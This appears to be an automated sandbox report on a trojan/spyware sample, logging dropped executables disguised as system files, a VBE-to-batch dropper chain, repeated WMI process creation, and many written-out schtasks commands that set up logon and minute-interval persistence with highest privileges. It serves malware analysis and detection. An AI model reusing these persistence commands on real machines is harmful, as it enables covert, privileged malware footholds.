              Source: lmXqPxTfNHomnnafzTOKZnFns.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
              Source: WmiPrvSE.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
              Source: Idle.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe0.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
              Source: upfc.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe1.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe2.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe3.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
              Source: WinStore.App.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe4.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe5.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
              Source: 6uPVRnocVS.exeBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs 6uPVRnocVS.exe
              Source: 6uPVRnocVS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: System.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: WmiPrvSE.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: Idle.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe0.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: upfc.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe1.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe2.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe3.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: WinStore.App.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe4.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe5.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@44/47@3/3
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_000F6EC9 GetLastError,FormatMessageW,0_2_000F6EC9
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_00109E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00109E1C
              Source: C:\ProgramData\ssh\System.exeFile created: C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\WmiPrvSE.exeJump to behavior
              Source: C:\ProgramData\ssh\System.exeFile created: C:\Users\Default User\lmXqPxTfNHomnnafzTOKZnFns.exeJump to behavior
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7036:120:WilError_03
              Source: C:\Recovery\Idle.exeMutant created: \Sessions\1\BaseNamedObjects\Local\58b06ae7820700040700431fad5b9c3b5c7f0ca7
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeMutant created: \Sessions\1\BaseNamedObjects\Global\CLR_PerfMon_WrapMutex
              Source: C:\ProgramData\ssh\System.exeFile created: C:\Users\user\AppData\Local\Temp\K8BHrhuEP2Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ssh\ML9lnBLRkA6sXD0.bat" "
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCommand line argument: sfxname0_2_0010D5D4
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCommand line argument: sfxstime0_2_0010D5D4
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCommand line argument: STARTDLG0_2_0010D5D4
              Source: 6uPVRnocVS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 6uPVRnocVS.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Recovery\Idle.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeFile read: C:\Windows\win.iniJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: rL05p88NW9.30.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: 6uPVRnocVS.exeVirustotal: Detection: 65%
              Source: 6uPVRnocVS.exeReversingLabs: Detection: 71%
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeFile read: C:\Users\user\Desktop\6uPVRnocVS.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\6uPVRnocVS.exe "C:\Users\user\Desktop\6uPVRnocVS.exe"
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\ssh\gnR14pXyuoFKj0R1.vbe"
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ssh\ML9lnBLRkA6sXD0.bat" "
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProgramData\ssh\System.exe "C:\\ProgramData\ssh\System.exe"
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFns" /sc ONLOGON /tr "'C:\Users\Default User\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 14 /tr "'C:\Windows\TAPI\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFns" /sc ONLOGON /tr "'C:\Windows\TAPI\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 13 /tr "'C:\Windows\TAPI\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 10 /tr "'C:\Users\Default\AppData\Roaming\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFns" /sc ONLOGON /tr "'C:\Users\Default\AppData\Roaming\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 8 /tr "'C:\Users\Default\AppData\Roaming\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\WmiPrvSE.exe'" /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\WmiPrvSE.exe'" /rl HIGHEST /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\WmiPrvSE.exe'" /rl HIGHEST /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFns" /sc ONLOGON /tr "'C:\Users\Default User\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Recovery\Idle.exe'" /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Recovery\Idle.exe'" /rl HIGHEST /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 5 /tr "'C:\Recovery\Idle.exe'" /rl HIGHEST /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 12 /tr "'C:\Recovery\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFns" /sc ONLOGON /tr "'C:\Recovery\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 13 /tr "'C:\Recovery\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 9 /tr "'C:\Recovery\upfc.exe'" /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Recovery\upfc.exe'" /rl HIGHEST /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 14 /tr "'C:\Recovery\upfc.exe'" /rl HIGHEST /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 12 /tr "'C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f
              Source: unknownProcess created: C:\Recovery\Idle.exe C:\Recovery\Idle.exe
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFns" /sc ONLOGON /tr "'C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 6 /tr "'C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
              Source: unknownProcess created: C:\Recovery\Idle.exe C:\Recovery\Idle.exe
              Source: unknownProcess created: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe "C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe"
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 14 /tr "'C:\Windows\LiveKernelReports\WinStore.App.exe'" /f
              Source: unknownProcess created: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe "C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe"
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WinStore.App" /sc ONLOGON /tr "'C:\Windows\LiveKernelReports\WinStore.App.exe'" /rl HIGHEST /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 6 /tr "'C:\Windows\LiveKernelReports\WinStore.App.exe'" /rl HIGHEST /f
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\ssh\gnR14pXyuoFKj0R1.vbe" Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ssh\ML9lnBLRkA6sXD0.bat" "Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProgramData\ssh\System.exe "C:\\ProgramData\ssh\System.exe"Jump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: dxgidebug.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
